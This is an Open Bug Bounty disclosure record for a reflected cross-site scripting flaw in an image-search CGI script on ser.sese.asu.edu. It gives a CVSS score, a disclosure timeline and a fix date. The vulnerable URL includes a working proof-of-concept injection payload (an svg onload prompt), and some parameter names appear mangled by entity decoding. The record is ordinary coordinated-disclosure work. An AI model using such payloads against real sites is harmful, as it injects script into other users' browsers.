ser.sese.asu.edu XSS vulnerability

2016-02-16T06:47:00
ID OBB:135267
Type openbugbounty
Reporter Spam404
Modified 2018-03-15T01:56:00

Description

Open Bug Bounty ID: OBB-135267

Description| Value
---|---
Affected Website:| ser.sese.asu.edu
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://ser.sese.asu.edu/cgi-bin/ImageSearch.pl?search_LAT=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E⪫_area=2.5&search;_LON=&lon;_area=2.5&FINDMET;=&FINDDOY;=&FINDYEAR;=2000&search;_REMOVE_BLANK=Yes&search;_limitsearch=Yes&search;_FITS_ONLY=No&html;=1&startat;=1&page;=10&Submit;=Search&search;_MINRES=0&search;_MAXRES=2520&search;_MINPHA=0&search;_MAXPHA=180&search;_MININC=%22%3E%3Cs&search;_MAXINC=180&search;_MINEMA=0&search;_MAXEMA=90&search;_MINEXPDUR=1&search;_MAXEXPDUR=998&search;_MINSEQID=1&search;_MAXSEQID=30&FILTER1;=on&FILTER2;=on&FILTER3;=on&FILTER4;=on&FILTER5;=on&FILTER6;=on&FILTER7;=on&search;_sort=met&search;_sortdir=asc
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 16 February, 2016 06:47 GMT
Vulnerability Verified:| 16 February, 2016 06:49 GMT
Website Operator Notified:| 16 February, 2016 06:49 GMT
Vulnerability Published:| 16 February, 2016 06:49 GMT[without any technical details]
Vulnerability Fixed:| 15 March, 2018 01:56 GMT
Public Disclosure:| 15 March, 2018 01:56 GMT